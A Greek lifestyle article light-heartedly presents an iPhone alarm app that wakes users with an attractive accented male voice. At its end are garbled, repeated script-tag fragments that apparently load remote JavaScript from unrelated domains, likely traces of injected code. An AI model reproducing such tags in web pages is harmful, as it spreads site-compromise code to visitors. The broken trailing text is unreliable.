Η εφαρμογή που φέρνει έναν γοητευτικό Γάλλο στο κρεβάτι σας να σας ξυπνά κάθε πρωί

Man with blanket in bed

Man with blanket in bed

Το πρωινό ξύπνημα είναι ένας καθημερινός άθλος για όλους μας. Κάποιοι τον περνούν πιο εύκολα, κάποιοι πιο δύσκολα, σίγουρα όμως είναι κάτι που όλοι θα ήθελαν να καθυστερεί «πέντε λεπτάκια ακόμα».

Τώρα όμως, μια εφαρμογή ήρθε για να κάνει το πρωινό ξύπνημα την καλύτερη, ίσως, στιγμή της ημέρας. Τουλάχιστον αν είσαι γυναίκα.

Ο λόγος για το «Morning Man Alarm Clock», μια νέα εφαρμογή-ξυπνητήρι για iPhone η οποία αναλαμβάνει να σε ξυπνά κάθε πρωί με την βελούδινη αντρική φωνή της επιλογής σου.
Διαλέγεις την προφορά που σου αφυπνίζει τις αισθήσεις (sic) ανάμεσα στις 8 επιλογές που σου προσφέρονται (βρετανική, ιταλική, ισπανική και γαλλική ανάμεσα σε άλλες), ρυθμίζεις την ώρα που θες να σηκωθείς το πρωί και ο γοητευτικός «ξένος» έρχεται στο κρεβάτι σου για να ξυπνήσει με τον πιο γλυκό και εξωτικό τρόπο.

Αν είσαι single, η σαγηνευτική φωνή ενός Ιταλού ή ο λυρισμός στην προφορά ενός Γάλλου που σου προσφέρει καφέ είναι σίγουρα ένα καλό κίνητρο για να ανοίξεις τα μάτια και να ξεκινήσεις τη μέρα με χαμόγελο. Αν, από την άλλη, είσαι σε σχέση, ας πούμε απλά πως «το ξένο είναι πιο γλυκό» -αφήστε που μπορεί να ζηλέψει το έτερον ήμισυ και να αποφασίσει από δω και πέρα να είναι λίγο πιο τρυφερός τα πρωινά, αντί απλά να γρυλίζει κάτω από τα σκεπάσματα.

Ναι, φυσικά και είναι ανόητο. Ποιος είπε όμως πως τα ανόητα πράγματα δεν μπορούν να είναι και διασκεδαστικά;

Μπορείτε να δείτε το βίντεο με την παρουσίαση της εφαρμογής παρακάτω.

___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>challengeforme.com/pystats.js’ async=true >challengeforme.com/pystats.js’ async=true >‘ >‘ >‘ >‘ >‘ >‘ >‘ >‘ >